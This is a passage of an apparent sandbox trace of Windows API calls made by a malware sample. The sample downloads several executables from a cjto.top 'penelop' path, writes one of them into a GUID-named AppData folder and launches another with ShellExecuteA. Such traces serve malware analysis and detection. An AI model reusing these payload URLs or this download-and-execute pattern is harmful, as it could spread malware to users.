(hObject=0x690) returned 1 [0166.020] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0166.123] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0166.123] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\updatewin2.exe", lpParameters=0x0, lpDirectory=0x0, nShowCmd=1) returned 0x2a [0166.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9fc38 | out: hHeap=0x2c0000) returned 1 [0166.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a58660 | out: hHeap=0x2c0000) returned 1 [0166.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0166.198] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0166.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x35796e0 [0166.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x85e) returned 0x3aa2818 [0166.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x35796e0, cbMultiByte=-1, lpWideCharStr=0x3aa2818, cchWideChar=1071 | out: lpWideCharStr="http://cjto.top/files/penelop/updatewin.exe") returned 44 [0166.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3a0b7f0 [0166.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0166.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35796e0 | out: hHeap=0x2c0000) returned 1 [0166.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0166.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82f) returned 0x3a8d2f0 [0166.198] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://cjto.top/files/penelop/updatewin.exe", cchWideChar=-1, lpMultiByteStr=0x3a8d2f0, cbMultiByte=2095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://cjto.top/files/penelop/updatewin.exe", lpUsedDefaultChar=0x0) returned 44 [0166.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0166.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0166.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0166.199] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="http://cjto.top/files/penelop/updatewin.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0168.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0168.045] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x9ffd6d0, lpdwBufferLength=0x9ffd710, lpdwIndex=0x0 | out: lpBuffer=0x9ffd6d0*, lpdwBufferLength=0x9ffd710*=0x4, lpdwIndex=0x0) returned 1 [0168.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a0b7f0 | out: hHeap=0x2c0000) returned 1 [0168.046] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0010 [0168.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x35796e0 [0168.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x84e) returned 0x3aa2818 [0168.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x35796e0, cbMultiByte=-1, lpWideCharStr=0x3aa2818, cchWideChar=1063 | out: lpWideCharStr="http://cjto.top/files/penelop/3.exe") returned 36 [0168.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x3a0b7f0 [0168.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0168.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35796e0 | out: hHeap=0x2c0000) returned 1 [0168.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x3aa2818 [0168.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x827) returned 0x3ad0490 [0168.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://cjto.top/files/penelop/3.exe", cchWideChar=-1, lpMultiByteStr=0x3ad0490, cbMultiByte=2087, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://cjto.top/files/penelop/3.exe", lpUsedDefaultChar=0x0) returned 36 [0168.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0168.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad0490 | out: hHeap=0x2c0000) returned 1 [0168.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0168.046] InternetOpenUrlA (hInternet=0xcc0010, lpszUrl="http://cjto.top/files/penelop/3.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc0018 [0168.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0168.873] HttpQueryInfoW (in: hRequest=0xcc0018, dwInfoLevel=0x20000013, lpBuffer=0x9ffd6d0, lpdwBufferLength=0x9ffd710, lpdwIndex=0x0 | out: lpBuffer=0x9ffd6d0*, lpdwBufferLength=0x9ffd710*=0x4, lpdwIndex=0x0) returned 1 [0168.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a0b7f0 | out: hHeap=0x2c0000) returned 1 [0168.873] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc001c [0168.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3579fa0 [0168.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x84e) returned 0x3aa2818 [0168.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3579fa0, cbMultiByte=-1, lpWideCharStr=0x3aa2818, cchWideChar=1063 | out: lpWideCharStr="http://cjto.top/files/penelop/4.exe") returned 36 [0168.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x3a0b7f0 [0168.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0168.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3579fa0 | out: hHeap=0x2c0000) returned 1 [0168.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x3aa2818 [0168.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x827) returned 0x3ad0490 [0168.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://cjto.top/files/penelop/4.exe", cchWideChar=-1, lpMultiByteStr=0x3ad0490, cbMultiByte=2087, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://cjto.top/files/penelop/4.exe", lpUsedDefaultChar=0x0) returned 36 [0168.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0168.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad0490 | out: hHeap=0x2c0000) returned 1 [0168.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0168.873] InternetOpenUrlA (hInternet=0xcc001c, lpszUrl="http://cjto.top/files/penelop/4.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc0024 [0171.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0171.355] HttpQueryInfoW (in: hRequest=0xcc0024, dwInfoLevel=0x20000013, lpBuffer=0x9ffd6d0, lpdwBufferLength=0x9ffd710, lpdwIndex=0x0 | out: lpBuffer=0x9ffd6d0*, lpdwBufferLength=0x9ffd710*=0x4, lpdwIndex=0x0) returned 1 [0171.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a0b7f0 | out: hHeap=0x2c0000) returned 1 [0171.355] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0028 [0171.355] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x357a048 [0171.355] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x84e) returned 0x3aa2818 [0171.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x357a048, cbMultiByte=-1, lpWideCharStr=0x3aa2818, cchWideChar=1063 | out: lpWideCharStr="http://cjto.top/files/penelop/5.exe") returned 36 [0171.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x3a0b7f0 [0171.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0171.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x357a048 | out: hHeap=0x2c0000) returned 1 [0171.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x3aa2818 [0171.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x827) returned 0x3ad0490 [0171.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://cjto.top/files/penelop/5.exe", cchWideChar=-1, lpMultiByteStr=0x3ad0490, cbMultiByte=2087, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://cjto.top/files/penelop/5.exe", lpUsedDefaultChar=0x0) returned 36 [0171.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0171.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad0490 | out: hHeap=0x2c0000) returned 1 [0171.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0171.356] InternetOpenUrlA (hInternet=0xcc0028, lpszUrl="http://cjto.top/files/penelop/5.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc0030 [0172.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0172.181] HttpQueryInfoW (in: hRequest=0xcc0030, dwInfoLevel=0x20000013, lpBuffer=0x9ffd6d0, lpdwBufferLength=0x9ffd710, lpdwIndex=0x0 | out: lpBuffer=0x9ffd6d0*, lpdwBufferLength=0x9ffd710*=0x4, lpdwIndex=0x0) returned 1 [0172.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534c68 [0172.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534c68 | out: hHeap=0x2c0000) returned 1 [0172.181] lstrcpyA (in: lpString1=0x3a0a798, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033" [0172.181] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033", pMore="5.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\5.exe") returned 1 [0172.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3a9fc38 [0172.181] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\5.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\5.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x68c [0172.183] SetFilePointer (in: hFile=0x68c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0172.183] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0172.653] WriteFile (in: hFile=0x68c, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0172.655] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0172.891] WriteFile (in: hFile=0x68c, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0172.891] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0172.892] WriteFile (in: hFile=0x68c, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0172.892] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0172.892] WriteFile (in: hFile=0x68c, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0172.893] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0173.127] WriteFile (in: hFile=0x68c, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0173.128] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0173.129] WriteFile (in: hFile=0x68c, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0173.129] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0173.130] WriteFile (in: hFile=0x68c, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0173.130] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0173.131] WriteFile (in: hFile=0x68c, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0173.131] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0173.365] WriteFile (in: hFile=0x68c, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0173.365] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0173.367] WriteFile (in: hFile=0x68c, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0173.367] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0173.367] WriteFile (in: hFile=0x68c, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0173.368] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0173.368] WriteFile (in: hFile=0x68c, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0173.368] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0173.369] WriteFile (in: hFile=0x68c, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0173.370] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0173.370] WriteFile (in: hFile=0x68c, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0173.370] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0173.371] WriteFile (in: hFile=0x68c, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0173.371] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0173.533] WriteFile (in: hFile=0x68c, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0173.533] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0173.534] WriteFile (in: hFile=0x68c, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0173.534] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0173.601] WriteFile (in: hFile=0x68c, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0173.602] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0173.602] WriteFile (in: hFile=0x68c, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0173.603] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0173.603] WriteFile (in: hFile=0x68c, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0173.603] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0173.603] WriteFile (in: hFile=0x68c, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0173.604] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0173.702] WriteFile (in: hFile=0x68c, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0173.703] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0173.703] WriteFile (in: hFile=0x68c, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0173.704] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0173.706] WriteFile (in: hFile=0x68c, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0173.706] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0173.780] WriteFile (in: hFile=0x68c, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0173.781] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0173.782] WriteFile (in: hFile=0x68c, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0173.783] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, 